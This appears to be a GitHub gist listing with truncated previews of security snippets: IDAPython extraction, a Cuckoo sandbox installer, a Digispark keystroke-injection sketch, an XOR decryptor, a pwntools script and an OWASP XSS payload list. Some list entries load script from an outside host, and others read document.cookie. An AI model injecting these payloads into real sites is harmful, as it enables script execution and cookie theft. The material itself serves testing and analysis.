This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | # variable start dan end bisa diatur sesuai kebutuhan | |
| # | |
| import idautils | |
| import idaapi | |
| start = 0x00403000 | |
| end = 0x00403027 | |
| flag = '' | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | # | |
| # IDAPython | |
| # Simple script untuk extract .data section | |
| # variable start dan end bisa diatur sesuai kebutuhan | |
| # | |
| import idautils | |
| import idaapi | |
| #start = idaapi.get_segm_by_name(".data").startEA | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | echo ############################ | |
| echo # cuckoo installer 2017.08 # | |
| echo ############################ | |
| echo [*] Installing requirement..... | |
| sudo apt-get install -y python python-pip python-dev libffi-dev libssl-dev python-virtualenv python-setuptools libjpeg-dev zlib1g-dev swig mongodb tcpdump libcap2-bin swig volatility | |
| echo [*] Installing Virtualbox | |
| echo deb http://download.virtualbox.org/virtualbox/debian xenial contrib | sudo tee -a /etc/apt/sources.list.d/virtualbox.list | |
| wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add - | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | #include "DigiKeyboard.h" | |
| void setup() { | |
| // don't need to set anything up to use DigiKeyboard | |
| } | |
| void loop() { | |
| // this is generally not necessary but with some older systems it seems to | |
| // prevent missing the first character after a delay: | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | //owasp | |
| '';!--"<XSS>=&{()} | |
| <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> | |
| <IMG SRC=JaVaScRiPt:alert('XSS')> | |
| <IMG SRC=javascript:alert("XSS")> | |
| <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
| <a onmouseover="alert(document.cookie)">xxs link</a> | |
| <a onmouseover=alert(document.cookie)>xxs link</a> | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | def decrypt(data,key): | |
| dp = '' | |
| for byte in data: | |
| dp += chr(ord(byte)^key) | |
| return dp | |
| with open('resume.pdf.encrypted','r') as f: | |
| firstline = f.readline() | |
| ## brute fisrt line | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | from pwn import * | |
| import re | |
| import string | |
| def LitE(H): | |
| return H[8:10]+'|'+H[6:8]+'|'+H[4:6]+'|'+H[2:4] | |
| def BigE(H): | |
| return H[2:4]+'|'+H[4:6]+'|'+H[6:8]+'|'+H[8:10] | 
NewerOlder